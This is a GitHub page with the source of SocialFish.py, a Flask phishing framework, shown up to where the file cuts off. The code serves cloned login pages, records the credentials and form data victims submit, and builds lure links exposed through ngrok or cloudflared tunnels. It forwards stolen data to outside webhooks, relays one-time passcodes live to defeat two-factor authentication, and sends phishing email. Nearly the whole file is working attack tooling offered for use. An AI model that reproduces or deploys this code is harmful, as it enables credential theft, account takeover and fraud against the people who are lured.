-
Notifications
You must be signed in to change notification settings - Fork 1.4k
Expand file tree
/
Copy pathSocialFish.py
More file actions
1507 lines (1306 loc) · 52.3 KB
/
Copy pathSocialFish.py
File metadata and controls
1507 lines (1306 loc) · 52.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/usr/bin/env python3
#
from flask import Flask, request, render_template, render_template_string, jsonify, redirect, g, flash
from flask_socketio import SocketIO, emit, join_room, leave_room
from core.config import *
from core.view import head
from core.scansf import nScan
from core.clonesf import clone
from core.dbsf import initDB
from core.genToken import genToken, genQRCode
from core.sendMail import sendMail
from core.tracegeoIp import tracegeoIp
from core.cleanFake import cleanFake
from core.genReport import genReport
from core.report import generate_unique
from core.db_migration import migrate_db
from core.tunnel_manager import TunnelManager
from core.recorder_playwright import PlaywrightRecorder
from core.cookie_inspector import CookieInspector
from core.recorder_selenium import SeleniumRecorder
from core.mock_server import MockLoginServer
from core.advanced_attacks import TabJacking, FileUploadInjection, AdvancedStealth, CAPTCHASolver
from datetime import date, datetime
from sys import argv, exit, version_info
import colorama
import sqlite3
import flask_login
import os
import json
import hashlib
import asyncio
import logging
from pathlib import Path
# Configure logging
logger = logging.getLogger("SocialFish")
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(name)s %(message)s")
# Verificar argumentos
if len(argv) < 2:
print("./SocialFish <youruser> <yourpassword>\n\ni.e.: ./SocialFish.py root pass")
exit(0)
# Temporario
try:
users = {argv[1]: {'password': argv[2]}}
except IndexError:
print("./SocialFish <youruser> <yourpassword>\n\ni.e.: ./SocialFish.py root pass")
exit(0)
# Definicoes do flask
app = Flask(__name__, static_url_path='',
static_folder='templates/static')
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
# Initialize SocketIO for live panel
socketio = SocketIO(app, cors_allowed_origins="*", async_mode='threading')
# Initialize managers
tunnel_manager = TunnelManager()
cookie_inspector = CookieInspector(DATABASE)
# Inicia uma conexao com o banco antes de cada requisicao
@app.before_request
def before_request():
g.db = sqlite3.connect(DATABASE)
# Finaliza a conexao com o banco apos cada conexao
@app.teardown_request
def teardown_request(exception):
if hasattr(g, 'db'):
g.db.close()
# Ensure `socialfish` table has a default row and provide safe getters
def ensure_socialfish_row(conn):
try:
# `conn` may be a sqlite3.Connection; use its execute which returns a cursor
conn.execute("""CREATE TABLE IF NOT EXISTS socialfish (
id integer PRIMARY KEY,
clicks integer,
attacks integer,
token text
); """)
cur = conn.execute("SELECT id FROM socialfish WHERE id = 1")
if cur.fetchone() is None:
t = genToken()
conn.execute('INSERT INTO socialfish(id,clicks,attacks,token) VALUES(?,?,?,?)', (1, 0, 0, t))
conn.commit()
except Exception as e:
print(f'[-] ensure_socialfish_row error: {e}')
def sf_get(cur, column, default=None):
try:
row = cur.execute(f"SELECT {column} FROM socialfish where id = 1").fetchone()
return row[0] if row and row[0] is not None else default
except Exception:
return default
# Conta o numero de credenciais salvas no banco
def countCreds():
count = 0
cur = g.db
select_all_creds = cur.execute("SELECT id, url, pdate, browser, bversion, platform, rip FROM creds order by id desc")
for i in select_all_creds:
count += 1
return count
# Conta o numero de visitantes que nao foram pegos no phishing
def countNotPickedUp():
count = 0
cur = g.db
select_clicks = cur.execute("SELECT clicks FROM socialfish where id = 1")
for i in select_clicks:
count = i[0]
count = count - countCreds()
return count
#----------------------------------------
# definicoes do flask e de login
app.secret_key = APP_SECRET_KEY
login_manager = flask_login.LoginManager()
login_manager.init_app(app)
class User(flask_login.UserMixin):
pass
@login_manager.user_loader
def user_loader(email):
if email not in users:
return
user = User()
user.id = email
return user
@login_manager.request_loader
def request_loader(request):
email = request.form.get('email')
if email not in users:
return
user = User()
user.id = email
user.is_authenticated = request.form['password'] == users[email]['password']
return user
# ---------------------------------------------------------------------------------------
# Rota para o caminho de inicializacao, onde e possivel fazer login
@app.route('/neptune', methods=['GET', 'POST'])
def admin():
# se a requisicao for get
if request.method == 'GET':
# se o usuario estiver logado retorna para a pagina de credenciais
if flask_login.current_user.is_authenticated:
return redirect('/creds')
# caso contrario retorna para a pagina de login
else:
return render_template('signin.html')
# se a requisicao for post, verifica-se as credencias
if request.method == 'POST':
email = request.form['email']
try:
# caso sejam corretas
if request.form['password'] == users[email]['password']:
user = User()
user.id = email
# torna autentico
flask_login.login_user(user)
# retorna acesso a pagina restrita
return redirect('/creds')
# contrario retorna erro
else:
# temporario
return "bad"
except:
return "bad"
# funcao onde e realizada a renderizacao da pagina para a vitima
@app.route("/")
def getLogin():
# Get config from database instead of global variables
conn = g.db
config = conn.execute("SELECT * FROM socialfish WHERE id = 1").fetchone()
# Retrieve status and URL from config or use defaults
cur = conn.execute("SELECT status, url, beef FROM config LIMIT 1")
conf_row = cur.fetchone()
if conf_row:
sta, url, beef = conf_row[0], conf_row[1], conf_row[2]
else:
sta = 'custom'
url = 'https://github.com/UndeadSec/SocialFish'
beef = 'no'
# caso esteja configurada para clonar, faz o download da pagina utilizando o user-agent do visitante
if sta == 'clone':
agent = request.headers.get('User-Agent', 'Unknown').encode('ascii', 'ignore').decode('ascii')
# Sanitize agent to prevent path traversal
agent = agent.replace('..', '').replace('/', '_')
clone(url, agent, beef)
o = url.replace('://', '-')
cur = g.db
cur.execute("UPDATE socialfish SET clicks = clicks + 1 WHERE id = 1")
g.db.commit()
template_path = 'fake/{}/{}/index.html'.format(agent, o)
return render_template(template_path)
# caso seja a url padrao
elif url == 'https://github.com/UndeadSec/SocialFish':
return render_template('default.html')
# caso seja configurada para custom
else:
cur = g.db
cur.execute("UPDATE socialfish SET clicks = clicks + 1 WHERE id = 1")
g.db.commit()
return render_template('custom.html')
# funcao onde e realizado o login por cada pagina falsa
@app.route('/login', methods=['POST'])
def postData():
if request.method == "POST":
fields = [k for k in request.form]
values = [request.form[k] for k in request.form]
data = dict(zip(fields, values))
browser = str(request.user_agent.browser) if request.user_agent else 'Unknown'
bversion = str(request.user_agent.version) if request.user_agent else 'Unknown'
platform = str(request.user_agent.platform) if request.user_agent else 'Unknown'
rip = str(request.remote_addr)
d = "{:%m-%d-%Y}".format(date.today())
# Get redirect URL from config table
cur = g.db
conf_row = cur.execute("SELECT red FROM config LIMIT 1").fetchone()
red = conf_row[0] if conf_row else 'https://github.com/UndeadSec/SocialFish'
# Get the target URL from config
url_row = cur.execute("SELECT url FROM config LIMIT 1").fetchone()
url = url_row[0] if url_row else 'https://github.com/UndeadSec/SocialFish'
sql = "INSERT INTO creds(url,jdoc,pdate,browser,bversion,platform,rip) VALUES(?,?,?,?,?,?,?)"
creds = (url, str(data), d, browser, bversion, platform, rip)
cur.execute(sql, creds)
g.db.commit()
# Get redirect URL from config
cur = g.db
conf_row = cur.execute("SELECT red FROM config LIMIT 1").fetchone()
red = conf_row[0] if conf_row else 'https://github.com/UndeadSec/SocialFish'
return redirect(red)
# funcao para configuracao do funcionamento CLONE ou CUSTOM, com BEEF ou NAO
@app.route('/configure', methods=['POST'])
def echo():
red = request.form.get('red', 'https://github.com/UndeadSec/SocialFish')
sta = request.form.get('status', 'custom')
beef = request.form.get('beef', 'no')
if sta == 'clone':
url = request.form.get('url', 'https://github.com/UndeadSec/SocialFish')
else:
url = 'Custom'
if len(url) > 4 and len(red) > 4:
if 'http://' not in url and sta != '1' and 'https://' not in url:
url = 'http://' + url
if 'http://' not in red and 'https://' not in red:
red = 'http://' + red
else:
url = 'https://github.com/UndeadSec/SocialFish'
red = 'https://github.com/UndeadSec/SocialFish'
# Store configuration in database instead of global variables
cur = g.db
# Create config table if it doesn't exist
cur.execute("""CREATE TABLE IF NOT EXISTS config (
id INTEGER PRIMARY KEY,
url TEXT,
red TEXT,
status TEXT,
beef TEXT
)""")
cur.execute("DELETE FROM config")
cur.execute("INSERT INTO config(url, red, status, beef) VALUES(?, ?, ?, ?)",
(url, red, sta, beef))
cur.execute("UPDATE socialfish SET attacks = attacks + 1 WHERE id = 1")
g.db.commit()
return redirect('/creds')
# pagina principal do dashboard
@app.route("/creds")
@flask_login.login_required
def getCreds():
cur = g.db
# Ensure the socialfish row exists and get values safely
ensure_socialfish_row(cur)
attacks = sf_get(cur, 'attacks', 0)
clicks = sf_get(cur, 'clicks', 0)
tokenapi = sf_get(cur, 'token', '')
data = cur.execute("SELECT id, url, pdate, browser, bversion, platform, rip FROM creds order by id desc").fetchall()
return render_template('admin/index.html', data=data, clicks=clicks, countCreds=countCreds, countNotPickedUp=countNotPickedUp, attacks=attacks, tokenapi=tokenapi)
# pagina para envio de emails
@app.route("/mail", methods=['GET', 'POST'])
@flask_login.login_required
def getMail():
if request.method == 'GET':
cur = g.db
row = cur.execute("SELECT email, smtp, port FROM sfmail where id = 1").fetchone()
if row:
email, smtp, port = row[0], row[1], row[2]
else:
email, smtp, port = '', '', ''
return render_template('admin/mail.html', email=email, smtp=smtp, port=port)
if request.method == 'POST':
subject = request.form['subject']
email = request.form['email']
password = request.form['password']
recipient = request.form['recipient']
body = request.form['body']
smtp = request.form['smtp']
port = request.form['port']
sendMail(subject, email, password, recipient, body, smtp, port)
cur = g.db
cur.execute("UPDATE sfmail SET email = ? WHERE id = 1", (email,))
cur.execute("UPDATE sfmail SET smtp = ? WHERE id = 1", (smtp,))
cur.execute("UPDATE sfmail SET port = ? WHERE id = 1", (port,))
g.db.commit()
return redirect('/mail')
# Rota para consulta de log
@app.route("/single/<id>", methods=['GET'])
@flask_login.login_required
def getSingleCred(id):
try:
if not id.isdigit():
return "Invalid ID"
sql = "SELECT jdoc FROM creds WHERE id = ?"
cur = g.db
credInfo = cur.execute(sql, (id,)).fetchall()
if len(credInfo) > 0:
return render_template('admin/singlecred.html', credInfo=credInfo)
else:
return "Not found"
except:
return "Bad parameter"
# rota para rastreio de ip
@app.route("/trace/<ip>", methods=['GET'])
@flask_login.login_required
def getTraceIp(ip):
import re
# Validate IP format
ip_pattern = r'^(\d{1,3}\.){3}\d{1,3}$|^127\.0\.0\.1$|^::1$|^[a-f0-9:]+$'
if not re.match(ip_pattern, ip):
return "Invalid IP format", 400
try:
traceIp = tracegeoIp(ip)
return render_template('admin/traceIp.html', traceIp=traceIp, ip=ip)
except Exception as e:
print(f'[-] Trace error: {str(e)}')
return "Network Error", 500
# rota para scan do nmap
@app.route("/scansf/<ip>", methods=['GET'])
@flask_login.login_required
def getScanSf(ip):
import re
# Validate IP format
ip_pattern = r'^(\d{1,3}\.){3}\d{1,3}$|^127\.0\.0\.1$|^::1$|^[a-f0-9:]+$'
if not re.match(ip_pattern, ip):
return "Invalid IP format", 400
return render_template('admin/scansf.html', nScan=nScan, ip=ip)
# rota post para revogar o token da api
@app.route("/revokeToken", methods=['POST'])
@flask_login.login_required
def revokeToken():
revoke = request.form['revoke']
if revoke == 'yes':
cur = g.db
new_token = genToken()
cur.execute("UPDATE socialfish SET token = ? WHERE id = 1", (new_token,))
g.db.commit()
ensure_socialfish_row(cur)
token = sf_get(cur, 'token', '')
genQRCode(token, revoked=True)
return redirect('/creds')
# pagina para gerar relatorios
@app.route("/report", methods=['GET', 'POST'])
@flask_login.login_required
def getReport():
if request.method == 'GET':
cur = g.db
urls = cur.execute("SELECT DISTINCT url FROM creds").fetchall()
users = cur.execute("SELECT name FROM professionals").fetchall()
companies = cur.execute("SELECT name FROM companies").fetchall()
uniqueUrls = []
for u in urls:
if u not in uniqueUrls:
uniqueUrls.append(u[0])
return render_template('admin/report.html', uniqueUrls=uniqueUrls, users=users, companies=companies)
if request.method == 'POST':
subject = request.form['subject']
user = request.form['selectUser']
company = request.form['selectCompany']
date_range = request.form['datefilter']
target = request.form['selectTarget']
_target = 'All' if target=='0' else target
genReport(DATABASE, subject, user, company, date_range, _target)
generate_unique(DATABASE,_target)
return redirect('/report')
# pagina para cadastro de profissionais
@app.route("/professionals", methods=['GET', 'POST'])
@flask_login.login_required
def getProfessionals():
if request.method == 'GET':
return render_template('admin/professionals.html')
if request.method == 'POST':
name = request.form['name']
email = request.form['email']
obs = request.form['obs']
sql = "INSERT INTO professionals(name,email,obs) VALUES(?,?,?)"
info = (name, email, obs)
cur = g.db
cur.execute(sql, info)
g.db.commit()
return redirect('/professionals')
# pagina para cadastro de empresas
@app.route("/companies", methods=['GET', 'POST'])
@flask_login.login_required
def getCompanies():
if request.method == 'GET':
return render_template('admin/companies.html')
if request.method == 'POST':
name = request.form['name']
email = request.form['email']
phone = request.form['phone']
address = request.form['address']
site = request.form['site']
sql = "INSERT INTO companies(name,email,phone,address,site) VALUES(?,?,?,?,?)"
info = (name, email, phone, address, site)
cur = g.db
cur.execute(sql, info)
g.db.commit()
return redirect('/companies')
# rota para gerenciamento de usuarios
@app.route("/sfusers/", methods=['GET'])
@flask_login.login_required
def getSfUsers():
return render_template('admin/sfusers.html')
#================================================================================================================================
# RECORDER & TEMPLATES ROUTES (v3.0+)
# Recorder - Start/Stop recording session
@app.route("/recorder/start", methods=['POST'])
@flask_login.login_required
def recorder_start():
"""Start a new recording session"""
data = request.json or request.form
target_url = data.get('url')
headless = data.get('headless', 'true').lower() == 'true'
stealth = data.get('stealth', 'true').lower() == 'true'
if not target_url:
return jsonify({'status': 'error', 'message': 'URL required'}), 400
try:
recorder = PlaywrightRecorder(DATABASE, headless=headless, stealth=stealth)
# Store recorder session in g for tracking
g.recorder = recorder
return jsonify({
'status': 'ok',
'message': 'Recording started',
'recorder_id': id(recorder)
})
except Exception as e:
return jsonify({'status': 'error', 'message': str(e)}), 500
# Recorder - Save template
@app.route("/recorder/save-template", methods=['POST'])
@flask_login.login_required
def save_template():
"""Save recording as a reusable template"""
data = request.json or request.form
template_name = data.get('name')
description = data.get('description', '')
tags = data.get('tags', '')
clone_mode = data.get('clone_mode', 'both')
if not template_name:
return jsonify({'status': 'error', 'message': 'Template name required'}), 400
try:
cur = g.db
cur.execute("""
INSERT INTO templates(name, base_url, description, tags, clone_mode, created_by)
VALUES(?, ?, ?, ?, ?, ?)
""", (
template_name,
data.get('base_url', 'https://example.com'),
description,
tags,
clone_mode,
flask_login.current_user.id
))
g.db.commit()
template_id = cur.lastrowid
return jsonify({
'status': 'ok',
'template_id': template_id,
'message': f'Template saved: {template_name}'
})
except Exception as e:
return jsonify({'status': 'error', 'message': str(e)}), 500
# Templates - List all templates
@app.route("/templates", methods=['GET'])
@flask_login.login_required
def list_templates():
"""List all saved templates"""
cur = g.db
templates = cur.execute("SELECT id, name, base_url, description, tags, clone_mode, created_at FROM templates ORDER BY created_at DESC").fetchall()
template_list = []
for t in templates:
template_list.append({
'id': t[0],
'name': t[1],
'base_url': t[2],
'description': t[3],
'tags': t[4],
'clone_mode': t[5],
'created_at': t[6]
})
if request.headers.get('Accept') == 'application/json':
return jsonify(template_list)
return render_template('admin/templates.html', templates=template_list)
# Templates - Load template details
@app.route("/templates/<int:template_id>", methods=['GET'])
@flask_login.login_required
def get_template(template_id):
"""Get template details"""
cur = g.db
template = cur.execute("SELECT * FROM templates WHERE id = ?", (template_id,)).fetchone()
if not template:
return jsonify({'status': 'error', 'message': 'Template not found'}), 404
return jsonify({
'id': template[0],
'name': template[1],
'base_url': template[2],
'description': template[3]
})
# MITM & Tunneling - Configure tunnel for template
@app.route("/tunnel/setup", methods=['POST'])
@flask_login.login_required
def tunnel_setup():
"""Setup tunnel (ngrok/cloudflared) for a template"""
data = request.json or request.form
template_id = data.get('template_id')
tunnel_type = data.get('tunnel_type', 'ngrok') # ngrok or cloudflared
tunnel_token = data.get('tunnel_token')
if tunnel_type == 'ngrok' and tunnel_token:
tunnel_url = tunnel_manager.start_ngrok_tunnel(
local_port=5000,
session_name=f"template_{template_id}"
)
elif tunnel_type == 'cloudflared':
tunnel_url = tunnel_manager.start_cloudflared_tunnel(
local_port=5000,
session_name=f"template_{template_id}"
)
else:
return jsonify({'status': 'error', 'message': 'Invalid tunnel type'}), 400
if tunnel_url:
# Store tunnel config in DB
cur = g.db
cur.execute("""
INSERT OR REPLACE INTO mitm_config(template_id, tunnel_type, tunnel_token, tunnel_domain)
VALUES(?, ?, ?, ?)
""", (template_id, tunnel_type, tunnel_token, tunnel_url))
g.db.commit()
return jsonify({
'status': 'ok',
'tunnel_url': tunnel_url,
'message': f'{tunnel_type} tunnel started'
})
return jsonify({'status': 'error', 'message': 'Failed to start tunnel'}), 500
# Lure URL - Generate phishing link
@app.route("/lure/generate", methods=['POST'])
@flask_login.login_required
def generate_lure():
"""Generate a lure URL for phishing campaign"""
data = request.json or request.form
template_id = data.get('template_id')
if not template_id:
return jsonify({'status': 'error', 'message': 'Template ID required'}), 400
# Generate lure hash
lure_hash = hashlib.sha256(f"{template_id}{date.today()}".encode()).hexdigest()[:16]
# Get tunnel URL for this template
cur = g.db
tunnel_config = cur.execute("SELECT tunnel_domain FROM mitm_config WHERE template_id = ?", (template_id,)).fetchone()
if tunnel_config and tunnel_config[0]:
lure_url = f"{tunnel_config[0]}/capture/{lure_hash}"
else:
# Fallback to localhost if no tunnel configured
lure_url = f"http://localhost:5000/capture/{lure_hash}"
# Store lure URL in DB
cur.execute("""
INSERT INTO lure_urls(template_id, lure_hash, full_url)
VALUES(?, ?, ?)
""", (template_id, lure_hash, lure_url))
g.db.commit()
return jsonify({
'status': 'ok',
'lure_url': lure_url,
'lure_hash': lure_hash
})
# Victim Capture Page - Generic phishing form
@app.route("/capture/<lure_hash>", methods=['GET', 'POST'])
def victim_capture(lure_hash):
"""Generic victim capture page - responds with cloned page or form"""
cur = g.db
# Find template by lure hash
lure_record = cur.execute("SELECT template_id FROM lure_urls WHERE lure_hash = ?", (lure_hash,)).fetchone()
if not lure_record:
return "Not found", 404
template_id = lure_record[0]
template = cur.execute("SELECT base_url, clone_mode FROM templates WHERE id = ?", (template_id,)).fetchone()
if not template:
return "Template not found", 404
if request.method == 'POST':
# Capture victim data
form_data = request.form.to_dict()
victim_ip = request.remote_addr
victim_ua = request.headers.get('User-Agent', 'Unknown')
# Create session record
session_hash = hashlib.sha256(f"{lure_hash}{victim_ip}{date.today()}".encode()).hexdigest()[:16]
cur.execute("""
INSERT INTO sessions(template_id, session_hash, victim_ip, victim_ua, form_data, submitted_credentials)
VALUES(?, ?, ?, ?, ?, ?)
""", (
template_id,
session_hash,
victim_ip,
victim_ua,
json.dumps(request.user_agent.__dict__ if hasattr(request, 'user_agent') else {}),
json.dumps(form_data)
))
g.db.commit()
session_id = cur.lastrowid
# Update lure click count
cur.execute("UPDATE lure_urls SET click_count = click_count + 1 WHERE lure_hash = ?", (lure_hash,))
g.db.commit()
# Trigger webhooks for this template
webhooks = cur.execute("SELECT webhook_url, webhook_type FROM webhooks WHERE template_id = ? AND enabled = 1", (template_id,)).fetchall()
for webhook_url, webhook_type in webhooks:
try:
import requests
payload = {
'session_id': session_id,
'victim_ip': victim_ip,
'form_data': form_data,
'timestamp': date.today().isoformat()
}
requests.post(webhook_url, json=payload, timeout=5)
except (requests.RequestException, Exception) as e:
print(f'[-] Webhook failed: {str(e)}')
# Emit live notification via WebSocket
socketio.emit('victim_submission', {
'template_id': template_id,
'session_id': session_id,
'victim_ip': victim_ip,
'timestamp': date.today().isoformat()
}, broadcast=True)
# Redirect to real site or OTP panel
if template[1] == 'cookies':
return redirect(template[0]) # Send to real site
else:
# Stay for OTP interception
return render_template('admin/otp_panel.html', session_id=session_id, template_id=template_id)
# GET - return cloned page
if template[1] == 'clone':
agent = request.headers.get('User-Agent', 'Unknown').encode('ascii', 'ignore').decode('ascii')
# Sanitize agent to prevent path traversal
agent = agent.replace('..', '').replace('/', '_').replace('\\', '_')
clone(template[0], agent, 'no') # Clone without BEEF
o = template[0].replace('://', '-')
template_path = f'fake/{agent}/{o}/index.html'
try:
return render_template(template_path)
except Exception:
return "Template not found", 404
else:
# Return custom template or generic form
return render_template('custom.html')
# Live OTP Panel - WebSocket endpoint
@socketio.on('otp_listen')
def otp_listen(data):
"""Listen for OTP codes on victim's browser"""
session_id = data.get('session_id')
join_room(f"otp_{session_id}")
emit('status', {'message': 'Listening for OTP'})
@socketio.on('otp_received')
def otp_received(data):
"""Operator received/received OTP code"""
session_id = data.get('session_id')
otp_code = data.get('otp_code')
# Emit to victim's browser to inject OTP
emit('inject_otp', {'otp_code': otp_code}, room=f"otp_{session_id}")
# Log OTP event
cur = g.db
cur.execute("""
INSERT INTO analyzer_logs(session_id, detection_type, detection_value)
VALUES(?, ?, ?)
""", (session_id, 'otp_injected', otp_code))
g.db.commit()
# Webhook Management - Add/delete webhooks
@app.route("/webhooks", methods=['GET', 'POST'])
@flask_login.login_required
def manage_webhooks():
"""Add webhook notification for template"""
if request.method == 'POST':
data = request.json or request.form
template_id = data.get('template_id')
webhook_url = data.get('webhook_url')
webhook_type = data.get('webhook_type', 'json')
trigger_on = data.get('trigger_on', 'credential_submit')
cur = g.db
cur.execute("""
INSERT INTO webhooks(template_id, webhook_url, webhook_type, trigger_on)
VALUES(?, ?, ?, ?)
""", (template_id, webhook_url, webhook_type, trigger_on))
g.db.commit()
return jsonify({'status': 'ok', 'message': 'Webhook added'})
# GET - list webhooks
cur = g.db
webhooks = cur.execute("SELECT id, template_id, webhook_url, webhook_type, trigger_on FROM webhooks").fetchall()
if request.headers.get('Accept') == 'application/json':
return jsonify([{
'id': w[0],
'template_id': w[1],
'webhook_url': w[2],
'webhook_type': w[3],
'trigger_on': w[4]
} for w in webhooks])
return render_template('admin/webhooks.html', webhooks=webhooks)
# Sessions - View captured sessions
@app.route("/sessions", methods=['GET'])
@flask_login.login_required
def list_sessions():
"""List all captured victim sessions"""
cur = g.db
sessions = cur.execute("""
SELECT id, template_id, session_hash, victim_ip, victim_ua, submission_timestamp
FROM sessions ORDER BY submission_timestamp DESC LIMIT 100
""").fetchall()
session_list = []
for s in sessions:
session_list.append({
'id': s[0],
'template_id': s[1],
'session_hash': s[2],
'victim_ip': s[3],
'victim_ua': s[4],
'timestamp': s[5]
})
if request.headers.get('Accept') == 'application/json':
return jsonify(session_list)
return render_template('admin/sessions.html', sessions=session_list)
# Session Details
@app.route("/session/<int:session_id>", methods=['GET'])
@flask_login.login_required
def get_session(session_id):
"""Get detailed session data"""
cur = g.db
session = cur.execute("""
SELECT id, template_id, session_hash, victim_ip, victim_ua, form_data, submitted_credentials, submission_timestamp
FROM sessions WHERE id = ?
""", (session_id,)).fetchone()
if not session:
return jsonify({'status': 'error', 'message': 'Session not found'}), 404
# Get cookies
cookies = cur.execute("SELECT name, value, domain, path FROM cookies WHERE session_id = ?", (session_id,)).fetchall()
return jsonify({
'id': session[0],
'template_id': session[1],
'session_hash': session[2],
'victim_ip': session[3],
'victim_ua': session[4],
'form_data': json.loads(session[5] if session[5] else '{}'),
'credentials': json.loads(session[6] if session[6] else '{}'),
'timestamp': session[7],
'cookies': [{
'name': c[0],
'value': c[1],
'domain': c[2],
'path': c[3]
} for c in cookies]
})
#================================================================================================================================
@app.route('/logout')
def logout():
flask_login.logout_user()
return 'Logged out'
@login_manager.unauthorized_handler
def unauthorized_handler():
return 'Unauthorized'
#--------------------------------------------------------------------------------------------------------------------------------
# MOBILE API
# VERIFICAR CHAVE
@app.route("/api/checkKey/<key>", methods=['GET'])
def checkKey(key):
cur = g.db
ensure_socialfish_row(cur)
tokenapi = sf_get(cur, 'token', '')
if key == tokenapi:
status = {'status':'ok'}
else:
status = {'status':'bad'}
return jsonify(status)
@app.route("/api/statistics/<key>", methods=['GET'])
def getStatics(key):
cur = g.db
ensure_socialfish_row(cur)
tokenapi = sf_get(cur, 'token', '')
if key == tokenapi:
cur = g.db
attacks = sf_get(cur, 'attacks', 0)
clicks = sf_get(cur, 'clicks', 0)
countC = countCreds()
countNPU = countNotPickedUp()
info = {'status':'ok','attacks':attacks, 'clicks':clicks, 'countCreds':countC, 'countNotPickedUp':countNPU}
else:
info = {'status':'bad'}
return jsonify(info)
@app.route("/api/getJson/<key>", methods=['GET'])
def getJson(key):
cur = g.db
ensure_socialfish_row(cur)
tokenapi = sf_get(cur, 'token', '')
if key == tokenapi:
try:
sql = "SELECT * FROM creds"
cur = g.db
credInfo = cur.execute(sql).fetchall()
listCreds = []
if len(credInfo) > 0:
for c in credInfo:
cred = {'id':c[0],'url':c[1], 'post':c[2], 'date':c[3], 'browser':c[4], 'version':c[5],'os':c[6],'ip':c[7]}
listCreds.append(cred)
else:
credInfo = {'status':'nothing'}
return jsonify(listCreds)
except:
return "Bad parameter"
else:
credInfo = {'status':'bad'}
return jsonify(credInfo)
@app.route('/api/configure', methods = ['POST'])
def postConfigureApi():
if request.is_json:
content = request.get_json()
cur = g.db
ensure_socialfish_row(cur)
tokenapi = sf_get(cur, 'token', '')
if content.get('key') == tokenapi:
red = content.get('red', 'https://github.com/UndeadSec/SocialFish')
beef = content.get('beef', 'no')
sta = content.get('sta', 'custom')
if sta == 'clone':
url = content.get('url', 'https://github.com/UndeadSec/SocialFish')
else:
url = 'Custom'
if url != 'Custom':
if len(url) > 4:
if 'http://' not in url and sta != '1' and 'https://' not in url:
url = 'http://' + url
if len(red) > 4:
if 'http://' not in red and 'https://' not in red:
red = 'http://' + red
else:
red = 'https://github.com/UndeadSec/SocialFish'
# Store in database instead of global variables
cur.execute("DELETE FROM config")
cur.execute("INSERT INTO config(url, red, status, beef) VALUES(?, ?, ?, ?)",
(url, red, sta, beef))
cur.execute("UPDATE socialfish SET attacks = attacks + 1 WHERE id = 1")
g.db.commit()
status = {'status':'ok'}
else:
status = {'status':'bad'}
else:
status = {'status':'bad'}
return jsonify(status)
@app.route("/api/mail", methods=['POST'])
def postSendMail():
if request.is_json:
content = request.get_json()
cur = g.db
ensure_socialfish_row(cur)
tokenapi = sf_get(cur, 'token', '')
if content['key'] == tokenapi:
subject = content['subject']
email = content['email']
password = content['password']
recipient = content['recipient']
body = content['body']
smtp = content['smtp']
port = content['port']
